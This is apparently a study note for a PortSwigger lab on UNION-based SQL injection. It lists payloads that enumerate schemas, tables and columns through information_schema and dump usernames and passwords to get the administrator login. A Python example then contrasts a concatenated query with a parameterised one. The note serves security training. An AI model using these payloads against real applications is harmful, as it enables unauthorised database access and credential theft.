Subject
Lab: SQL injection attack, listing the database contents on non-Oracle databases
Url: portswigger.net/web-securit…
Mind Palace
# Identify the injection point, determine the number of columns, and find which columns are echoed
' union select '111','222'--
# List all database (schema) names
' union select null,table_schema from information_schema.tables--
# List all table names in the suspicious schema 'public'
' union select null,table_name from information_schema.tables where table_schema='public'--
# List all column names of the suspicious table 'users_odgyjx'
' union select null,column_name from information_schema.columns where table_name='users_odgyjx'--
# ==> Two column names obtained: password_gnthnb username_dolvfr
# Read the data
' union select username_dolvfr,password_gnthnb from public.users_odgyjx--
# Obtain the administrator account and its password
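Why the first payload above works, shown as an added example that is not part of the original note or of the PortSwigger lab code: a query built by string concatenation beside its parameterised form, run against a constructed in-memory SQLite table (assumptions: the injectable parameter is a product-category filter, and SQLite stands in for the lab's PostgreSQL-style database).

```python
import sqlite3

# Constructed sample rows standing in for the lab's product catalogue (assumption:
# the injectable parameter is a product-category filter, as in the lab).
CONSTRUCTED_ROWS = [("Gifts", "Mug"), ("Gifts", "Pen"), ("Pets", "Collar")]

# The first payload from the note; the trailing -- comments out the closing quote.
PAYLOAD = "' union select '111','222'--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", CONSTRUCTED_ROWS)
    return conn


def filter_vulnerable(conn, category):
    # String concatenation: the quote in the payload closes the literal and the
    # rest is parsed as SQL, so a UNION can append attacker-chosen rows.
    sql = "SELECT category, name FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def filter_safe(conn, category):
    # Parameterised query: the whole string is bound as one value and never
    # parsed as SQL, so the payload simply matches no category.
    sql = "SELECT category, name FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", filter_vulnerable(db, PAYLOAD))  # injected row ('111', '222')
    print("safe:      ", filter_safe(db, PAYLOAD))        # []
```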
END ´ヾ(=・ω・=)o